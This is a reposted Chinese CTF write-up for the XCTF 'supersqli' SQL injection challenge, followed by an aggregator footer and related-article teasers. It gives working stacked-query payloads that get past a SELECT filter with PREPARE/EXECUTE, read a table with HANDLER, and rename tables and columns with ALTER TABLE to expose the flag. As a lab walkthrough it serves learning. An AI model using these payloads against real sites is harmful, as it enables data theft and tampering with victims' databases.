Xctf練習sql注入--supersqli

三種方法

方法一

=1 回顯正常
=1’回顯不正常,報sql語法錯誤
=1’ --+ 回顯正常,說明有sql注入點,應該是字符型注入(# 不能用)
=1’ order by 3 --+ 回顯失敗,說明有2個注入點
=1’ union select 1,2 --+ 回顯顯示過濾語句:
在這里插入圖片描述
=1’; show databases --+ 爆數據庫名
在這里插入圖片描述

=-1’; show tables --+ 繞過過濾,顯示表下的列名
在這里插入圖片描述
=1’;show columns from words --+ 嘗試堆疊注入(多條語句)
在這里插入圖片描述

nothing…
在這里插入圖片描述

想要進一步拿到信息,只有想辦法繞過select語句

這里需要用到 sql語句的預編譯
https://blog.csdn.net/weixin_45694388/article/details/111871581

-1';set @sql = CONCAT('sele','ct * from `1919810931114514`;');prepare aaa from @sql;EXECUTE aaa;#

在這里插入圖片描述
再次通過大小寫繞過關鍵字prepare過濾
在這里插入圖片描述

方法二:handler查詢

mysql可以使用select查詢表中的數據,也可使用handler語句,這條語句是一行一行的瀏覽一個表中的數據。
handler可以用于MyISAM和InnoDB表。
使用方法:
handler table_name open打開一張表
handler table_name read first讀取第一行內容,
handler table_name read next依次獲取其它行
最后一行執行之后再執行handel table_name read next會返回一個空的結果。

-1';handler `1919810931114514` open;handler `1919810931114514` read first;#

方法三 他好騷啊

有如下列,其中有一個列就是data列我們是可以進行查詢,爆出內容的,所以我們可以利用數據庫修改表名和列名的方法,將我們要查詢的表名改成第二個,就可以查詢出我們想要的內容了

=1'; alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);#

介紹一下這幾句:
alter table words rename to aaaa;先把原來的words表名字改成別的,這個隨便
alter table 1919810931114514 rename to words;將表1919810931114514的名字改為words
alter table words change flag id varchar(100);將改完名字后的表中的flag改為id,字符串盡量長點吧

然后我們用1’ or 1=1 --+直接就能得到正確結果
在這里插入圖片描述

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/532579.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/532579.shtml
英文地址,請注明出處:http://en.pswp.cn/news/532579.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

深拷貝與淺拷貝、值語義與引用語義對象語義 ——以C++和Python為例

深拷貝與淺拷貝、值語義與引用語義/對象語義 ——以C和Python為例 值語義與引用語義(對象語義) 本小節參考自:https://www.cnblogs.com/Solstice/archive/2011/08/16/2141515.html 概念 在任何編程語言中,區分深淺拷貝的關鍵都…

一次打卡軟件的實戰滲透測試

直接打卡抓包, 發現有疑似企業網站,查ip直接顯示以下頁面 直接顯示了后臺安裝界面…就很有意思 探針和phpinfo存在 嘗試連接mysql失敗 fofa掃描為阿里云服務器 找到公司官網使用nmap掃描,存在端口使用onethink 查詢onethink OneThink是一個開源的內容管理框架,…

C++中類的拷貝控制

C中類的拷貝控制 轉自:https://www.cnblogs.com/ronny/p/3734110.html 1,什么是類的拷貝控制 當我們定義一個類的時候,為了讓我們定義的類類型像內置類型(char,int,double等)一樣好用,我們通常需要考下面…

centos7ubuntu搭建Vulhub靶場(推薦Ubuntu)

這里寫目錄標題一.前言總結二.成功操作:三.出現報錯:四.vulhub使用正文:一.前言總結二.成功操作:三.出現報錯:四.vulhub使用看完點贊關注不迷路!!!! 后續繼續更新優質安全內容!!!!!一.前言總結 二.成功操作&#xff1…

使用 PyTorch 數據讀取,JAX 框架來訓練一個簡單的神經網絡

使用 PyTorch 數據讀取,JAX 框架來訓練一個簡單的神經網絡 本文例程部分主要參考官方文檔。 JAX簡介 JAX 的前身是 Autograd ,也就是說 JAX 是 Autograd 升級版本,JAX 可以對 Python 和 NumPy 程序進行自動微分。可以通過 Python的大量特征…

Yapi Mock 遠程代碼執行漏洞

跟風一波復現Yapi 漏洞描述: YApi接口管理平臺遠程代碼執行0day漏洞,攻擊者可通過平臺注冊用戶添加接口,設置mock腳本從而執行任意代碼。鑒于該漏洞目前處于0day漏洞利用狀態,強烈建議客戶盡快采取緩解措施以避免受此漏洞影響 …

C++ ACM模式輸入輸出

C ACM模式輸入輸出 以下我們都以求和作為題目要求,來看一下各種輸入輸出應該怎么寫。 1 只有一個或幾個輸入 輸入樣例: 3 5 7輸入輸出模板: int main() {int a, b, c;// 接收有限個輸入cin >> a >> b >> c;// 輸出結果…

CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞

漏洞產生原因: CVE-2017-10271漏洞產生的原因大致是Weblogic的WLS Security組件對外提供webservice服務,其中使用了XMLDecoder來解析用戶傳入的XML數據,在解析的過程中出現反序列化漏洞,導致可執行任意命令。攻擊者發送精心構造的…

樹莓派攝像頭 C++ OpenCV YoloV3 實現實時目標檢測

樹莓派攝像頭 C OpenCV YoloV3 實現實時目標檢測 本文將實現樹莓派攝像頭 C OpenCV YoloV3 實現實時目標檢測,我們會先實現樹莓派對視頻文件的逐幀檢測來驗證算法流程,成功后,再接入攝像頭進行實時目標檢測。 先聲明一下筆者的主要軟硬件配…

【實戰】記錄一次服務器挖礦病毒處理

信息收集及kill: 查看監控顯示長期CPU利用率超高,懷疑中了病毒 top 命令查看進程資源占用: netstat -lntupa 命令查看有無ip進行發包 netstat -antp 然而并沒有找到對應的進程名 查看java進程和solr進程 ps aux :查看所有進程…

ag 搜索工具參數詳解

ag 搜索工具參數詳解 Ag 是類似ack, grep的工具,它來在文件中搜索相應關鍵字。 官方列出了幾點選擇它的理由: 它比ack還要快 (和grep不在一個數量級上)它會忽略.gitignore和.hgignore中的匹配文件如果有你想忽略的文…

CVE-2013-4547 文件名邏輯漏洞

搭建環境,訪問 8080 端口 漏洞說明: Nginx: Nginx是一款輕量級的Web 服務器/反向代理服務器及電子郵件(IMAP/POP3)代理服務器,在BSD-like 協議下發行。其特點是占有內存少,并發能力強&#xf…

CMake指令入門 ——以構建OpenCV項目為例

CMake指令入門 ——以構建OpenCV項目為例 轉自:https://blog.csdn.net/sandalphon4869/article/details/100589747 一、安裝 sudo apt-get install cmake安裝好后,輸入 cmake -version如果出現了cmake的版本顯示,那么說明安裝成功 二、c…

CVE-2017-7529Nginx越界讀取緩存漏洞POC

漏洞影響 低危,造成信息泄露,暴露真實ip等 實驗內容 漏洞原理 通過查看patch確定問題是由于對http header中range域處理不當造成,焦點在ngx_http_range_parse 函數中的循環: HTTP頭部range域的內容大約為Range: bytes4096-81…

Linux命令行性能監控工具大全

Linux命令行性能監控工具大全 作者:Arnold Lu 原文:https://www.cnblogs.com/arnoldlu/p/9462221.html 關鍵詞:top、perf、sar、ksar、mpstat、uptime、vmstat、pidstat、time、cpustat、munin、htop、glances、atop、nmon、pcp-gui、collect…

Weblogic12c T3 協議安全漏洞分析【CVE-2020-14645 CVE-2020-2883 CVE-2020-14645】

給個關注?寶兒! 給個關注?寶兒! 給個關注?寶兒! 關注公眾號:b1gpig信息安全,文章推送不錯過 ## 前言 WebLogic是美國Oracle公司出品的一個application server,確切的說是一個基于JAV…

Getshell總結

按方式分類: 0x01注入getshell: 0x02 上傳 getwebshell 0x03 RCE getshell 0x04 包含getwebshell 0x05 漏洞組合拳getshell 0x06 系統層getcmdshell 0x07 釣魚 getcmdshell 0x08 cms后臺getshell 0x09 紅隊shell競爭分析 0x01注入getshell:…

編寫可靠bash腳本的一些技巧

編寫可靠bash腳本的一些技巧 原作者:騰訊技術工程 原文鏈接:https://zhuanlan.zhihu.com/p/123989641 寫過很多 bash 腳本的人都知道,bash 的坑不是一般的多。 其實 bash 本身并不是一個很嚴謹的語言,但是很多時候也不得不用。以下…

python 到 poc

0x01 特殊函數 0x02 模塊 0x03 小工具開發記錄 特殊函數 # -*- coding:utf-8 -*- #內容見POC.demo; POC.demo2 ;def add(x,y):axyprint(a)add(3,5) print(------------引入lambad版本:) add lambda x,y : xy print(add(3,5)) #lambda函數,在lambda函數后面直接…

protobuf版本常見問題

protobuf版本常見問題 許多軟件都依賴 google 的 protobuf,我們很有可能在安裝多個軟件時重復安裝了多個版本的 protobuf,它們之間很可能出現沖突并導致在后續的工作中出現版本不匹配之類的錯誤。本文將討論筆者在使用 protobuf 中遇到的一些問題&#…